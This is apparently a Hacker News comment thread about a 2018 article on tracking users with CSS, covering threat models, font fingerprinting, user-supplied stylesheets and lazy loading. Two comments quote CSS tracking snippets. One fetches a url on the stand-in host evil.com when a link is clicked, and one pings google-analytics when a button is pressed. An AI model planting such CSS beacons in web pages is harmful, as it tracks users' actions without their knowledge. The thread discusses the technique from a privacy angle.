Tracking Users with CSS (2018)

saagarjha|7 years ago

This article seems to have a threat model where a website is “compromised” into sending user data to a third party, but I don’t really see anything that protects users from a website whose owner actively wants to track them. This is an odd threat model to have.

Also, as an aside:

> For example, by detecting whether the browser supports the Calibri font family, we can assume that the browser is running in Windows

I’m pretty sure that Safari has stopped allowing the use of third party fonts for exactly this reason, and now reports a standard set of fonts as being available.

javajosh|7 years ago

You can't assume that only the origin will be serving css. Most pages these days contain resources from all over the web, and most developers assume that CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in content: url("https://evil.com/track?action=link_clicked" can point to anywhere on the web? Or just the origin of the css? Or...?

wongarsu|7 years ago

There are multiple sites that allow users to set custom CSS. Consider for example subreddit styles on reddit or the customisation of Tumblr pages.

One big selling point for CSS was to separate layout and content exactly to allow other people to write CSS.

rebuilder|7 years ago

It's the threat model that the customers they're trying to bring in would care about.

Tepix|7 years ago

I like the idea of loading all linked content at page load time.

DaiPlusPlus|7 years ago

That’s bad for mobile - especially if a website has really large images for high-DPI devices. I think you can configure some mobile browsers to always download low-DPI assets to save on bandwidth.

AnaniasAnanas|7 years ago

By linked I hope that you mean things like images and CSS style-sheets rather than actual <a> links. If so, I totally agree with you, this kind of lazy loading that css utilises is a true privacy nightmare.

jwilk|7 years ago

Previous discussion:

https://news.ycombinator.com/item?id=16157773

unknown|7 years ago

[deleted]

fawelo123|7 years ago

Afaik doesnt work on Firefox.

fawelo123|7 years ago

And if you are using anything but Firefox you shouldn't worry about your browser history anyway. Due to fingerprintning you give all of your browsing history to Google regardless.

interfixus|7 years ago

Css is fundamentally breaching the contract by messing in any way whatsoever with content.

scegit|7 years ago

You can still do this

input[type="button"]:active { background-image: url('http://www.google-analytics.com/collect?v=1&_v=j23&a=...'); }

https://www.smashingmagazine.com/2014/10/css-only-solution-f...

16 comments